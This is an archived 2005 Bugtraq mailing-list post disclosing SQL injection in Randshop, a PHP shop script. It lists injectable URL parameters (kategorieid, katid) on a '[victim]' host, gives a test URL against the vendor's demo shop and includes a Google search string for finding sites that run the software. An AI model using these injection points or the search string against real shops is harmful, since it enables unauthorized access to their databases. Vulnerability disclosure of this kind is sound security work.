[41382] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Randshop all versiyon Sql İnjection

daemon@ATHENA.MIT.EDU (liz0@bsdmail.com)
Mon Nov 28 15:44:45 2005

Date: 28 Nov 2005 15:26:35 -0000
Message-ID: <20051128152635.10237.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: liz0@bsdmail.com
To: bugtraq@securityfocus.com

Randshop all versiyon  Sql &#304;njection 

Website:http://www.randshop.com

Demo:http://www.randshop.com/demoshop/
-------------------------------------------------------------------
Credit:Liz0ziM & wannacut Mail:Liz0@bsdmail.com www.biyo.tk

-------------------------------------------------------------------
exploit :

http://[victim]/folder/themes/kategorie/index.php?kategorieid=6[SQL]
http://[victim]/folder/themes/kategorie/index.php?katid=40[SQL]

--------------------------------------------------------------------------------
eg:

http://www.randshop.com/demoshop/themes/kategorie/index.php?kategorieid=21'

--------------------------------------------------------------------

Google:intext:"software 2004-2005 by randshop"





http://www.blogcu.com/Liz0ziM/112800/



http://biyo.5gigs.com/randshop.txt


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[41382] in bugtraq

Randshop all versiyon Sql İnjection

daemon@ATHENA.MIT.EDU (liz0@bsdmail.com)Mon Nov 28 15:44:45 2005

daemon@ATHENA.MIT.EDU (liz0@bsdmail.com)
Mon Nov 28 15:44:45 2005